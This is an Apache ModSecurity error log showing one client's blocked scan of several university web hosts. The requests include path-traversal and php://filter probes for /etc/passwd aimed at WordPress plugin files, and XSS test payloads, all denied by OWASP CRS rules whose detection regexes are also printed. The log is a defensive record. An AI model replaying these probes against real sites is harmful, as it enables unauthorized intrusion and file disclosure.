[Tue Aug 29 11:53:23.183748 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:controller: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15w8Co-f0AAAoz704AAAAS"]
[Tue Aug 29 11:53:23.197052 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:movie_param. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:movie_param: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/avchat-3/index_popup.php"] [unique_id "ZO15w8Co-f0AAAfWOWwAAAAL"]
[Tue Aug 29 11:53:23.285827 2023] [:error] [pid 2605] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:movie_param. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:movie_param: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/avchat-3/index_popup.php"] [unique_id "ZO15w8Co-f0AAAot8PUAAAAn"]
[Tue Aug 29 11:53:23.314699 2023] [:error] [pid 2610] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:movie_param. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:movie_param: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/avchat-3/index_popup.php"] [unique_id "ZO15w8Co-f0AAAoyGykAAAAI"]
[Tue Aug 29 11:53:23.419293 2023] [:error] [pid 2603] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:movie_param. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:movie_param: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/avchat-3/index_popup.php"] [unique_id "ZO15w8Co-f0AAAor7rkAAAAk"]
[Tue Aug 29 11:53:23.549718 2023] [:error] [pid 2608] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:movie_param. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:movie_param: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/avchat-3/index_popup.php"] [unique_id "ZO15w8Co-f0AAAowNocAAAAH"]
[Tue Aug 29 11:53:23.552540 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/web-portal-lite-client-portal-secure-file-sharing-private-messaging/includes/libs/pdf/dompdf.php"] [unique_id "ZO15w8Co-f0AAAoLfS0AAAAG"]
[Tue Aug 29 11:53:23.836844 2023] [:error] [pid 2552] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/buddypress-component-stats/lib/dompdf/dompdf.php"] [unique_id "ZO15w8Co-f0AAAn405YAAAAW"]
[Tue Aug 29 11:53:24.088044 2023] [:error] [pid 2609] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/buddypress-component-stats/lib/dompdf/dompdf.php"] [unique_id "ZO15xMCo-f0AAAox7GUAAAAN"]
[Tue Aug 29 11:53:24.088242 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:controller: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15xMCo-f0AAAolKWMAAAAe"]
[Tue Aug 29 11:53:24.117428 2023] [:error] [pid 2592] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:movie_param. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:movie_param: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/avchat-3/index_popup.php"] [unique_id "ZO15xMCo-f0AAAog@E0AAAAY"]
[Tue Aug 29 11:53:24.120669 2023] [:error] [pid 2602] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/buddypress-component-stats/lib/dompdf/dompdf.php"] [unique_id "ZO15xMCo-f0AAAoqbSAAAAAj"]
[Tue Aug 29 11:53:24.124128 2023] [:error] [pid 2582] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/buddypress-component-stats/lib/dompdf/dompdf.php"] [unique_id "ZO15xMCo-f0AAAoW7PoAAAAJ"]
[Tue Aug 29 11:53:24.139547 2023] [:error] [pid 2612] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/abstract-submission/dompdf-0.5.1/dompdf.php"] [unique_id "ZO15xMCo-f0AAAo0gNYAAAAZ"]
[Tue Aug 29 11:53:24.648160 2023] [:error] [pid 2605] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/abstract-submission/dompdf-0.5.1/dompdf.php"] [unique_id "ZO15xMCo-f0AAAot8PkAAAAn"]
[Tue Aug 29 11:53:24.652240 2023] [:error] [pid 2592] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:urls[<img src=x onerror=alert(document.domain)>]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within ARGS_NAMES:urls[<img src=x onerror=alert(document.domain)>]: urls[<img src=x onerror=alert(document.domain)>]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15xMCo-f0AAAog@E8AAAAY"]
[Tue Aug 29 11:53:24.652860 2023] [:error] [pid 2604] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\bonerror\\\\b\\\\W*?\\\\=" at ARGS_NAMES:urls[<img src=x onerror=alert(document.domain)>]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "133"] [id "958404"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: onerror= found within ARGS_NAMES:urls[<img src=x onerror=alert(document.domain)>]: urls[<img src=x onerror=alert(document.domain)>]"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15xMCo-f0AAAosCxkAAAAm"]
[Tue Aug 29 11:53:24.653257 2023] [:error] [pid 2609] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\bonerror\\\\b\\\\W*?\\\\=" at ARGS_NAMES:urls[<img src=x onerror=alert(document.domain)>]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "133"] [id "958404"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: onerror= found within ARGS_NAMES:urls[<img src=x onerror=alert(document.domain)>]: urls[<img src=x onerror=alert(document.domain)>]"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15xMCo-f0AAAox7GcAAAAN"]
[Tue Aug 29 11:53:24.739468 2023] [:error] [pid 2608] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/post-pdf-export/dompdf/dompdf.php"] [unique_id "ZO15xMCo-f0AAAowNosAAAAH"]
[Tue Aug 29 11:53:24.758693 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/abstract-submission/dompdf-0.5.1/dompdf.php"] [unique_id "ZO15xMCo-f0AAAfWOW4AAAAL"]
[Tue Aug 29 11:53:24.767766 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/abstract-submission/dompdf-0.5.1/dompdf.php"] [unique_id "ZO15xMCo-f0AAAoz71MAAAAS"]
[Tue Aug 29 11:53:24.768582 2023] [:error] [pid 2612] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/abstract-submission/dompdf-0.5.1/dompdf.php"] [unique_id "ZO15xMCo-f0AAAo0gNgAAAAZ"]
[Tue Aug 29 11:53:24.786400 2023] [:error] [pid 2604] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\bonerror\\\\b\\\\W*?\\\\=" at ARGS_NAMES:urls[<img src=x onerror=alert(document.domain)>]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "133"] [id "958404"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: onerror= found within ARGS_NAMES:urls[<img src=x onerror=alert(document.domain)>]: urls[<img src=x onerror=alert(document.domain)>]"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15xMCo-f0AAAosCxsAAAAm"]
[Tue Aug 29 11:53:24.793180 2023] [:error] [pid 2591] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:urls[<img src=x onerror=alert(document.domain)>]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within ARGS_NAMES:urls[<img src=x onerror=alert(document.domain)>]: urls[<img src=x onerror=alert(document.domain)>]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15xMCo-f0AAAofm7YAAAAX"]
[Tue Aug 29 11:53:24.796149 2023] [:error] [pid 2603] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\bonerror\\\\b\\\\W*?\\\\=" at ARGS_NAMES:urls[<img src=x onerror=alert(document.domain)>]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "133"] [id "958404"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: onerror= found within ARGS_NAMES:urls[<img src=x onerror=alert(document.domain)>]: urls[<img src=x onerror=alert(document.domain)>]"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15xMCo-f0AAAor7r8AAAAk"]
[Tue Aug 29 11:53:25.687242 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:query: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/search"] [unique_id "ZO15xcCo-f0AAAfWOXAAAAAL"]
